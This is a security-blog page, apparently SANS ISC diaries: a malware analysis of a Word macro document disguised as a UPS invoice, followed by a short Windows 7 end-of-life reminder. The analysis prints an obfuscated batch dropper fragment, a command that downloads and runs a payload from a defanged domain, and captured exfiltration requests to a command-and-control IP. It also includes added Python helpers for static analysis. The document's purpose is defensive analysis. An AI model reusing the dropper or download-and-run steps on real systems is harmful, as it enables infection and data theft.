Quick Analysis of a(nother) Maldoc

Published: 2020-01-09
Last Updated: 2020-01-09 12:15:01 UTC
by Xavier Mertens (Version: 1)
2 comment(s)

Yesterday, one of our readers (thanks, David!) submitted to us a malicious document disguised as a UPS invoice. Like David, do not hesitate to share samples with us, we like malware samples! I briefly checked the document. Nothing new: it is based on a classic macro and was easy to analyze, so I can give you an overview of the infection process and of the kind of data that gets exfiltrated.

The malicious document was called 'ups_invoice_0701932_262.doc' (SHA256:be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af) and has a current VT score of 10/61[1]. It contains several macros that perform the malicious activity once the document is opened:

# oledump.py ups_invoice_0701932_262_doc 
A: word/vbaProject.bin
 A1:       734 'PROJECT'
 A2:        30 'PROJECTlk'
 A3:       233 'PROJECTwm'
 A4:        97 'UserForm1/\x01CompObj'
 A5:       294 'UserForm1/\x03VBFrame'
 A6:       883 'UserForm1/f'
 A7:      6688 'UserForm1/o'
 A8: M    1453 'VBA/Module1'
 A9: M   21943 'VBA/Module2'
A10: M    2239 'VBA/Module3'
A11: M    2331 'VBA/Module4'
A12: M  252836 'VBA/NewMacros'
A13: m     938 'VBA/ThisDocument'
A14: m    1493 'VBA/UserForm1'
A15:      8300 'VBA/_VBA_PROJECT'
A16:      1302 'VBA/dir'
A17: M  412655 'VBA/wLoadImages'


The infection path is the following: Word > Macro > Batch File (.cmd) > VBScript > Windows PE

The macro dumps a batch file to disk (SHA256:96d785cdc95bff2f081f57d2c9fdee3b76daf1c3295d2b9e6298678ed32953b9). The dropped file is '%APPDATA%\..EnableDelayedExpansion\Documents1.CMD'. Most of its commands are simple "echo" statements that are used to create a VBS script, '%APPDATA%\..EnableDelayedExpansion\gdibits.vbs'.

A sample of the code, padded with garbage strings and junk comment lines to make it more difficult to read:

@echo off
echo "93319427177886784668351442764871949889113678316627428857276359"
set mtspf=%APPDATA%\..EnableDelayedExpansion\gdibits.vbs
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo Dim hResBit, MpicOffer, xmpage, MenuPrice, ListPrice, Fundament, BufferBat >> %mtspf%
echo On Error Resume Next >> %mtspf%
echo. >> %mtspf%
echo Set hResBit = Wscript.Arguments >> %mtspf%
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo "471495911668846928514952834168735538343318577458669595"
echo "137756746277365597113689825816848246219143776556384827"
echo "589196889244714223435471453592227671689523411938182673"
echo "714793381962982623587978735968646573151481843754943393"
echo Set MpicOffer = CreateObject("MSXML2.ServerXMLHTTP.6.0") >> %mtspf%
echo "72797134559562738358938549883642286878881617597196952189815336"
echo ListPrice = hResBit(0) >> %mtspf%
echo Fundament = hResBit(1) >> %mtspf%
echo 'The most common question that restaurants are asking us revolve >> %mtspf%
echo 'special accommodations) that may be requested >> %mtspf%
echo. >> %mtspf%
echo MpicOffer.Open "GET", ListPrice, False >> %mtspf%


Then the VBS script is launched with two arguments (retrieved through Wscript.Arguments, as seen above):

cscript //nologo %APPDATA%\..EnableDelayedExpansion\gdibits.vbs hxxps://greatingusa[.]com/red1.res %APPDATA%\..EnableDelayedExpansion\hddput8.exe

Finally, hddput8.exe is launched:

start %APPDATA%\..EnableDelayedExpansion\hddput8.exe"

The PE file (SHA256:cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158) has a VT score of 44/72[2].
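The batch-to-VBS stage can be recovered without running anything by statically emulating the `echo ... >> %var%` redirects. The Python below is an added example (not code from the diary or from the malware) applied to the fragment quoted above; the variable name and target path come from the page, and dropping the junk VBScript comment lines is my own choice.

```python
import re

# Fragment of the dropper batch file quoted in the diary, junk lines included.
BATCH_SAMPLE = r"""@echo off
echo "93319427177886784668351442764871949889113678316627428857276359"
set mtspf=%APPDATA%\..EnableDelayedExpansion\gdibits.vbs
echo 'To determine H. pylori resistance to clarithromycin >> %mtspf%
echo 'were designed against the 23S rRNA gene >> %mtspf%
echo Dim hResBit, MpicOffer, xmpage, MenuPrice, ListPrice, Fundament, BufferBat >> %mtspf%
echo On Error Resume Next >> %mtspf%
echo. >> %mtspf%
echo Set hResBit = Wscript.Arguments >> %mtspf%
echo "471495911668846928514952834168735538343318577458669595"
echo Set MpicOffer = CreateObject("MSXML2.ServerXMLHTTP.6.0") >> %mtspf%
echo ListPrice = hResBit(0) >> %mtspf%
echo Fundament = hResBit(1) >> %mtspf%
echo 'The most common question that restaurants are asking us revolve >> %mtspf%
echo. >> %mtspf%
echo MpicOffer.Open "GET", ListPrice, False >> %mtspf%
"""

# 'set NAME=VALUE' and 'echo PAYLOAD >> %NAME%' ('echo. >> %NAME%' writes a blank line)
SET_RE = re.compile(r"^\s*set\s+(\w+)=(.*?)\s*$", re.IGNORECASE)
ECHO_RE = re.compile(r"^\s*echo(?:\.|\s(.*?))\s*>>\s*%(\w+)%\s*$", re.IGNORECASE)


def rebuild_dropped_scripts(batch_text, drop_comments=True):
    """Emulate the echo redirects and return {resolved target path: [lines]}.

    Echo lines without a redirect (the digit-string padding) never reach the
    VBS file, so they are ignored; with drop_comments the junk VBScript
    comment lines (leading apostrophe) are removed as well.
    """
    variables, scripts = {}, {}
    for raw in batch_text.splitlines():
        m = SET_RE.match(raw)
        if m:
            variables[m.group(1).lower()] = m.group(2)
            continue
        m = ECHO_RE.match(raw)
        if not m:
            continue                      # '@echo off', padding, other commands
        payload = m.group(1) or ""        # 'echo.' -> empty line
        if drop_comments and payload.lstrip().startswith("'"):
            continue
        target = variables.get(m.group(2).lower(), "%" + m.group(2) + "%")
        scripts.setdefault(target, []).append(payload)
    return scripts
```

Running it on the full Documents1.CMD yields the plain VBS downloader, which is easier to read than the batch file and matches the cscript invocation below.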

Here are some of the HTTP POST requests with exfiltrated data performed by the malware:

POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=aksgja8s8d8a8s97
User-Agent: KSKJJGJ
Host: 203.176.135.102:8082
Content-Length: 4419
Cache-Control: no-cache

--aksgja8s8d8a8s97
Content-Disposition: form-data; name="proclist"

***TASK LIST***

[System Process]
System
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
lsm.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
spoolsv.exe
svchost.exe
taskhost.exe
dwm.exe
svchost.exe
svchost.exe
svchost.exe
notepad.exe
calc.exe
svchost.exe
notepad.exe
explorer.exe
iexplore.exe
WmiPrvSE.exe
rundll32.exe
svchost.exe

--aksgja8s8d8a8s97
Content-Disposition: form-data; name="sysinfo"

***S Y S T E M I N F O***

HostName: 3OwiR2Q
OSName: Microsoft Windows 7 Professional 
OSVersion: Service Pack 1
OSArchitecture: 64-bit
ProductType: Workstation
BuildType: Multiprocessor Free
RegisteredOwner: Zahwl3xniYy
RegisteredOrg: CVDh5l614
SerialNumber: 00371-222-2524677-68218
InstallDate: 30/12/1899 00.00.00
LastBootUpTime: 30/12/1899 00.00.00
WindowsDirectory: C:\Windows
SystemDirectory: C:\Windows\system32
BootDevice: \Device\HarddiskVolume1
TotalPhysicalMemory: 3127 Mb
AvailablePhysicalMemory: 3127 Mb


/c ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : <redacted>
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Realtek RTL8139C+ Fast Ethernet NIC
   Physical Address. . . . . . . . . : <redacted>
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : <Redacted>(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.100.6(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Thursday, January 09, 2019 6:19:19 AM
   Lease Expires . . . . . . . . . . : Thursday, January 16, 2156 1:08:23 AM
   Default Gateway . . . . . . . . . : 192.168.100.1
   DHCP Server . . . . . . . . . . . : 192.168.100.1
   DHCPv6 IAID . . . . . . . . . . . : 240276480
   DHCPv6 Client DUID. . . . . . . . : <Redacted>
   DNS Servers . . . . . . . . . . . : 8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Disabled


/c net config workstation
Computer name                        \\<Redacted>
Full Computer name                   <Redacted>
User name                            Administrator

Workstation active on                
Software version                     Windows 7 Professional

Workstation domain                   WORKGROUP
Workstation Domain DNS Name          <Redacted>.com
Logon domain                         TESTER

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250

The command completed successfully.

/c net view /all
There are no entries in the list.

/c net view /all /domain
There are no entries in the list.

/c nltest /domain_trusts
Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

/c nltest /domain_trusts /all_trusts
Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF

--aksgja8s8d8a8s97--

HTTP/1.1 200 OK
server: Cowboy
date: Thu, 09 Jan 2020 09:41:52 GMT
content-length: 3
Content-Type: text/plain

/1/


POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------PAOUUIBNQKZQDUJR
Content-Length: 210

-----------PAOUUIBNQKZQDUJR
Content-Disposition: form-data; name="data"

-----------PAOUUIBNQKZQDUJR
Content-Disposition: form-data; name="source"

OpenSSH private keys
-----------PAOUUIBNQKZQDUJR--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:42:07 GMT
content-length: 3
Content-Type: text/plain

/1/


POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/83/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------QPKAEZSIUTKMSAWM
Content-Length: 299

-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="formdata"

{]}

-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="billinfo"

{]}
-----------QPKAEZSIUTKMSAWM
Content-Disposition: form-data; name="cardinfo"

{SQL logic error
-----------QPKAEZSIUTKMSAWM--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:41:16 GMT
content-length: 3
Content-Type: text/plain

/1/


POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 203.176.135.102
Connection: close
Content-Type: multipart/form-data; boundary=---------ITSDTHZDVZQGMVVI
Content-Length: 219

-----------ITSDTHZDVZQGMVVI
Content-Disposition: form-data; name="data"

-----------ITSDTHZDVZQGMVVI
Content-Disposition: form-data; name="source"

OpenVPN passwords and configs
-----------ITSDTHZDVZQGMVVI--

HTTP/1.1 200 OK
connection: close
server: Cowboy
date: Thu, 09 Jan 2020 09:41:41 GMT
content-length: 3
Content-Type: text/plain

/1/
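To triage captures like the ones above, it helps to split the multipart body into its named fields. The Python below is an added example (not part of the diary) that reconstructs a request from the second capture and parses it; note that the boundary itself already starts with dashes, so the delimiter on the wire is "--" plus the boundary, and an empty field (here "data") means the stealer module found nothing.

```python
import re

# Constructed from the second capture in the diary: the boundary starts with
# nine dashes, so the on-the-wire delimiter is "--" + boundary (eleven dashes).
BOUNDARY = "---------PAOUUIBNQKZQDUJR"
DELIM = "--" + BOUNDARY
EXFIL_POST = (
    "POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1\r\n"
    "Host: 203.176.135.102\r\n"
    "Connection: close\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "\r\n"
    f"{DELIM}\r\n"
    'Content-Disposition: form-data; name="data"\r\n'
    "\r\n"
    f"{DELIM}\r\n"
    'Content-Disposition: form-data; name="source"\r\n'
    "\r\n"
    "OpenSSH private keys\r\n"
    f"{DELIM}--\r\n"
)

def parse_exfil_post(raw):
    """Return {"path", "module", "headers", "parts"} for a captured POST.

    'module' is the trailing path segment (90, 81 and 83 in the diary's
    captures); 'parts' maps each form-data field name to its body, with ""
    for an empty field such as the 'data' part above.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    _, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    m = re.search(r"boundary=([^;\s]+)", headers.get("content-type", ""))
    if not m:
        raise ValueError("not a multipart/form-data request")
    parts = {}
    for chunk in body.split("--" + m.group(1))[1:]:
        if chunk.startswith("--"):
            break                                  # closing delimiter
        part_head, _, part_body = chunk[2:].partition("\r\n\r\n")
        if part_body.endswith("\r\n"):
            part_body = part_body[:-2]             # CRLF before the next delimiter
        name = re.search(r'name="([^"]*)"', part_head)
        parts[name.group(1) if name else part_head] = part_body
    return {"path": path, "module": path.rstrip("/").rsplit("/", 1)[-1],
            "headers": headers, "parts": parts}
```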

Note that, at the time I'm writing this diary, the domain 'greatingusa[.]com' is still active. 

[1] https://www.virustotal.com/gui/file/be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af/detection
[2] https://www.virustotal.com/gui/file/cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key


Windows 7 - End of Life

Published: 2020-01-09
Last Updated: 2020-01-09 02:41:03 UTC
by Kevin Shortt (Version: 1)
1 comment(s)

A quick reminder note today for everyone: the Microsoft Windows 7 operating system reaches End of Life on January 14, 2020. [1]

Yep, that's Patch Tuesday! So you get one more update on the books before it stops.

There will be no more free updates to the Win 7 OS for users. While using, installing and activating Windows 7 is still possible after January 14, it is recommended that all instances be upgraded to Windows 10. If you need to extend your support, Microsoft has a program you should inquire about. [2]

If you need to know the lifecycle of any Microsoft product, check out the link below. [3]

-Kevin

--
ISC Handler on Duty


[1] https://www.microsoft.com/en-us/microsoft-365/windows/end-of-windows-7-support
[2] https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates
[3] https://support.microsoft.com/en-us/lifecycle/search

Keywords: Windows7